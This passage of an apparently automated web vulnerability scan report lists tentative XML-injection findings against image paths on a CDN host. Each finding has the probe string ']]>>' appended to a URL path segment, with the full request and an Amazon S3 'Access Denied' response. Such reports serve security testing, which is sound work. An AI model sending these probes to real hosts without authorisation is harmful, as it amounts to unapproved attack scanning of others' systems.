GET /REL-fansnap-1.20.2-r31787]]>>/images/1px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3EB099E5C85ED1AD
x-amz-id-2: v1/0ARGrladU7/iQq6L0OhaM9DQvBvufNzFr69Ov+2YTAq7vZw9Y/e1JoelI4PjF
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:42 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7ab8fa1c8d8a2d18309dcff06214b59aa3c91867cd055dfaad415e85823703ffbd41f513b2a5546f
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3EB099E5C85ED1AD</RequestId><HostId>v1/0ARGrladU7/iQq6L0OhaM9DQvBvufNzFr69Ov+2YTAq7vZw
...[SNIP]...

8.2. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/1px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2C5C890FB7018FD8
x-amz-id-2: BJ8a8o7cUm2zfdHlEefh4mIDt1I6Gi/59WRVsqnwdQjcA5c9pdXNqdBIPHU8yPbZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a547c93f7a372bf74e9f5aefc9b990277ebd8b8a2813b2ca76ffd2b02b4546c6a6b3488713d505c9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2C5C890FB7018FD8</RequestId><HostId>BJ8a8o7cUm2zfdHlEefh4mIDt1I6Gi/59WRVsqnwdQjcA5c9pd
...[SNIP]...

8.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/1px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D7D0308E692C1837
x-amz-id-2: l0+wvdYbAIuKKy7/RDLj3cdp+gNR8yyluI4ezTCZdEsVuX0FmtbyYxFXNvBuCNJB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0f5a70ab86d79067d7a08c06aa7507e172491a3a20eba8a71e0c55e8740239cc356cd4ad0e010ce6
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D7D0308E692C1837</RequestId><HostId>l0+wvdYbAIuKKy7/RDLj3cdp+gNR8yyluI4ezTCZdEsVuX0Fmt
...[SNIP]...

8.4. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AA2623B21FF77E94
x-amz-id-2: nEM8bH2KIaoliJmVNtxhjwS4QKXs6/5CfnlG/PNDmUIRITI1YbRzzxPEYomHDM3M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4d0cbe48d11b0741d1b23eac659945b0dbc4232decb7c529c86c07a3860ce66c024b4e2dfd1d7c31
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AA2623B21FF77E94</RequestId><HostId>nEM8bH2KIaoliJmVNtxhjwS4QKXs6/5CfnlG/PNDmUIRITI1Yb
...[SNIP]...

8.5. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8ECE51982D15406C
x-amz-id-2: jVeoEzqBDbyLmUZ7H3uahL+5Lr9ZoE87jppicd1pISc0PbUMdoRGpC0pMAJUsI4O
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 54fef84fc635d94ff5faec609d33531fedf6c231f7f01c22135b50e95bf30bd39e1595d9148f10c2
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8ECE51982D15406C</RequestId><HostId>jVeoEzqBDbyLmUZ7H3uahL+5Lr9ZoE87jppicd1pISc0PbUMdo
...[SNIP]...

8.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 791F535E8E4273CC
x-amz-id-2: 4WzY4vMXvpFzkb1Z4KxNFqctS1tHQXVLn/xxx+RcHx65NPDIcEHFq+BFqJHw2NzX
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c336a5ddb5f0d32bf68147cf00312507238dcb9422d2a6995fa14f566427b289c74de399c9ce6840
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>791F535E8E4273CC</RequestId><HostId>4WzY4vMXvpFzkb1Z4KxNFqctS1tHQXVLn/xxx+RcHx65NPDIcE
...[SNIP]...

8.7. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5539AF809BCD156D
x-amz-id-2: ZiwP2oPRz4kIyb0dOdqGaGPrsyZIKJD+m8oReCfUByr9NSEEokN+KOUwCLQeo5Te
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 799b4ccab57887ac26d515ecfa0205b546848c55c9a02057e951d4700d439d9ec4c88e70e7b3e385
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5539AF809BCD156D</RequestId><HostId>ZiwP2oPRz4kIyb0dOdqGaGPrsyZIKJD+m8oReCfUByr9NSEEok
...[SNIP]...

8.8. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 79ABACABB7FEB232
x-amz-id-2: 2Siw4EHg7GfQq2oWtOSY5JHhlojFzLMItgBM62LN4TVAIRQHUg+qFHmP+Zuayldi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d22f553beedf6f9ce364ab622cc0696be3b6533a8104d26a08c6900011b4d1a08149b8a1b5c8cb60
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>79ABACABB7FEB232</RequestId><HostId>2Siw4EHg7GfQq2oWtOSY5JHhlojFzLMItgBM62LN4TVAIRQHUg
...[SNIP]...

8.9. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B4EEB6055894B254
x-amz-id-2: 6M8RBkeD3Fr+ShDOTvngA7A3xTtdtleHtq4aAjUqqyCUYEMh+HO0KkqaS1LDB70r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6426b2b08ef5bafc1fcff9fce48bfafc1087efed0dc018350891fe58c44226f4da697aa9e3350350
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B4EEB6055894B254</RequestId><HostId>6M8RBkeD3Fr+ShDOTvngA7A3xTtdtleHtq4aAjUqqyCUYEMh+H
...[SNIP]...

8.10. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C9E78FBE6715807B
x-amz-id-2: CPYlOnTFv9eD6KoQ1J8HDfVTBp9oqcfdFyzPbxS3Pvrn4eiT03PqmXHFp9O8dN4R
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4474b8092af040f2351707ea0922e9f90357303a50bffb5d621962730a74a118f15ab3be423a8e18
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C9E78FBE6715807B</RequestId><HostId>CPYlOnTFv9eD6KoQ1J8HDfVTBp9oqcfdFyzPbxS3Pvrn4eiT03
...[SNIP]...

8.11. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5CF1A090273BDBF6
x-amz-id-2: hpM/klLX3QWRgm1K2g0lfT9/rpVjB4/2a/j1Vv1Fy1F4pr+eHsnsNk936pD989sK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 038c8aaba8c3d54fd459b6ad5c065eae6eb4da0cbcbb5df51bd4a82d57927095d86417af467ecade
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5CF1A090273BDBF6</RequestId><HostId>hpM/klLX3QWRgm1K2g0lfT9/rpVjB4/2a/j1Vv1Fy1F4pr+eHs
...[SNIP]...

8.12. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C6A63C6825263473
x-amz-id-2: 59QoP3VpLFeK40GfoaGriehjnznyt3i4w7/f0CiKMSIma3UIG5KOUdqlnlGBA/bw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 65229e81acf69a2dc8c8a095cf0ef4b90c25e2f84d992767292cb3ebaab05715c17d917dc167c9fd
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C6A63C6825263473</RequestId><HostId>59QoP3VpLFeK40GfoaGriehjnznyt3i4w7/f0CiKMSIma3UIG5
...[SNIP]...

8.13. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8909734295289F98
x-amz-id-2: NWp6oH8trgD+Dp2PJzV53ulXFMjMKsE0qMet9b1sZFcw2YwoYGqNNgDO6OPfYCsM
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e3c5a8383bbc9b52982f3aaf07db30ab7ab24071faeb3335f3db4289b377821f508c83d35938db9d
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8909734295289F98</RequestId><HostId>NWp6oH8trgD+Dp2PJzV53ulXFMjMKsE0qMet9b1sZFcw2YwoYG
...[SNIP]...

8.14. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6496BC305C6648B7
x-amz-id-2: ZjP1j5WXiV26OZFfZU2aeqMnc9gKHfGSyzOmFfNiIiNSpQaZveFoyVyICY0dUEv/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
